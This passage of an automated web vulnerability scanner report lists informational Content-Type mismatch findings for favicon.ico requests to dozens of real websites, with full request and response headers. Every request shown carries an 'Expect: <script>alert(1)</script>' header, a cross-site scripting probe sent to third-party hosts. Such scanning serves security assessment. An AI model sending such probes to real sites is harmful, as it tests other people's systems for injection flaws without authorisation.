Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.93. http://www.galvestoncruises.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.galvestoncruises.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.galvestoncruises.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:00:24 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.94. http://www.gbase.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gbase.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gbase.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=TaxYWZ1AzAEkAAAAMWE2NzMxMTgtOGI4Zi00ZjdjLTkxYzEtNWExNDhkYTJkNDIxUlAibIDq0KsXanPKKVuyzkLl0_M1; expires=Tue, 12-Jul-2011 14:09:43 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:29:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.95. http://www.getpartsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.getpartsonline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getpartsonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:50:23 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.96. http://www.gibill.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gibill.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gibill.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 13 Jul 2010 22:39:58 GMT
ETag: "128-48b4c8c82cb80"
Accept-Ranges: bytes
Content-Length: 296
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=14221
Date: Wed, 04 May 2011 02:52:34 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%...B.........4 v.b%(....@|..w.._.....I3Hc...d.3.&..,..$8.I.d.,.. .....3..Il.....{b.Q..Y....s...VC..h.g.........^.
...[SNIP]...

31.97. http://www.giga-byte.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.giga-byte.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.giga-byte.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:50:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.98. http://www.go2web20.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.go2web20.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.go2web20.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:27:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.99. http://www.goldfeverprospecting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.goldfeverprospecting.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goldfeverprospecting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:38:49 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.100. http://www.greatbigsea.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greatbigsea.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatbigsea.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
web6: web6
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.101. http://www.greatfunnypictures.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greatfunnypictures.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatfunnypictures.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:05:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.102. http://www.greenoptions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenoptions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greenoptions.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:39:40 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Wed, 27 Apr 2011 16:55:56 GMT
X-VBackend-By: app005,D=1290
Content-Length: 1150
X-Varnish: 969691969 969659864
Age: 22671
Via: 1.1 varnish
X-Served-By: varnish002.huddler.com
X-Cache: HIT
P3P: policyref="http://www.huddler.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

............ .h.......(....... ..... ..................................v^ .v^..v^..v^..v^..v^..v^..v^..v^..v^..v^p.v^..............v^`.v^..v^..v^..v^..v^..v^..v^..v^..v^..v^..v^..v^..........v^ .v^..v
...[SNIP]...

31.103. http://www.greetingsisland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greetingsisland.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greetingsisland.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:45 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.104. http://www.guesssms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.guesssms.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guesssms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:33:03 GMT
Content-Length: 60
Set-Cookie: BIGipServerpool-207.97.255.200-GSS-WWW=1845602496.20480.0000; path=/

The page cannot be displayed because the expectation failed.

31.105. http://www.gulfshores.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gulfshores.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gulfshores.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:19:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.106. http://www.healthypets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.healthypets.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthypets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:08:22 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.107. http://www.heartdetectives.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.heartdetectives.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heartdetectives.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:38:28 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

31.108. http://www.hellohouston.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hellohouston.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hellohouston.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:24:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.109. http://www.hellolosangeles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hellolosangeles.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hellolosangeles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:41:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.110. http://www.hellolouisville.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hellolouisville.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hellolouisville.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 00:54:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.111. http://www.helsinki.fi/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.helsinki.fi
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helsinki.fi
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Date: Wed, 04 May 2011 01:12:53 GMT
Server: Apache
Content-Length: 14
Content-Type: text/html; charset=iso-8859-1
Age: 153
X-Cache: HIT from pweb-0.ad.helsinki.fi
X-Cache-Lookup: HIT from pweb-0.ad.helsinki.fi:80
Via: 1.0 pweb-0.ad.helsinki.fi:80 (squid/2.6.STABLE21)
Connection: close

No favicon.ico

31.112. http://www.hinduwebsite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hinduwebsite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hinduwebsite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:56:45 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.113. http://www.hmshost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hmshost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hmshost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:40:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.114. http://www.hoosiertopics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hoosiertopics.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hoosiertopics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Wed, 04 May 2011 01:38:34 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

31.115. http://www.humortank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.humortank.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.humortank.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:24:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.116. http://www.iberiabank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.iberiabank.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iberiabank.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 02:07:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.117. http://www.ihireconstruction.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ihireconstruction.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihireconstruction.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-SERVED-BY: 103
Date: Wed, 04 May 2011 01:45:09 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.118. http://www.ihirelogistics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ihirelogistics.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihirelogistics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-SERVED-BY: 110
Date: Wed, 04 May 2011 01:10:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.119. http://www.ihs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ihs.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:37:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.120. http://www.ireland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ireland.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ireland.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:19:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.121. http://www.israellycool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.israellycool.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.israellycool.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:13:01 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "57e-469ba419-0"
Last-Modified: Mon, 16 Jul 2007 17:00:09 GMT
Content-Type: text/plain
Content-Length: 1406
X-Powered-By: W3 Total Cache/0.9.1.3

..............h.......(....... ............................................................dg.............{Z\..rs..|}.F..H...I...oAB.tGH..lm..wx.4...3...2...1...0...$.......D...G.F.G...H...L...k9
...[SNIP]...

31.122. http://www.jlconline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jlconline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jlconline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/1.3.27 (Unix) mod_ssl/2.8.14 OpenSSL/0.9.6g
Last-Modified: Wed, 03 Mar 2004 03:40:10 GMT
ETag: "7edeb-2fe-4045539a"
Accept-Ranges: bytes
Content-Length: 766
Content-Type: text/plain
X-Serial: 1
X-Check-Cacheable: YES
Date: Wed, 04 May 2011 03:21:30 GMT
Connection: close

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

31.123. http://www.jobilephones.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jobilephones.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobilephones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 00:50:51 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

31.124. http://www.jonasbrothers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jonasbrothers.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jonasbrothers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:18:21 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

31.125. http://www.kansasworks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kansasworks.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kansasworks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:22:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.126. http://www.kgoam810.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kgoam810.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kgoam810.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 72
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDAQSSAAQC=JKGKHNDAMECAHBDGPOLOHLAJ; path=/
Cache-control: private
Set-Cookie: NSC_LHP=ffffffff09021f3045525d5f4f58455e445a4a42222f;path=/

<br>Error, file not found: 404;http://www.kgoam810.com:5151/favicon.ico

31.127. http://www.kjmagnetics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kjmagnetics.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kjmagnetics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.128. http://www.krcrtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.krcrtv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.krcrtv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 21 Jul 2010 14:43:09 GMT
ETag: "7020e4b-47e-d2031940"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=695
Expires: Wed, 04 May 2011 03:19:52 GMT
Date: Wed, 04 May 2011 03:08:17 GMT
Connection: close
Set-Cookie: alpha=5dce8f18a260000021c3c04d4b910300feae0000; expires=Sat, 01-May-2021 03:08:17 GMT; path=/; domain=.krcrtv.com

............ .h.......(....... ..... .....@....................]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..[E..tj..................|t..\I..]B..]B..]B..]B..]B..]B..c
...[SNIP]...

31.129. http://www.leadrotation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leadrotation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leadrotation.com
Accept: */*
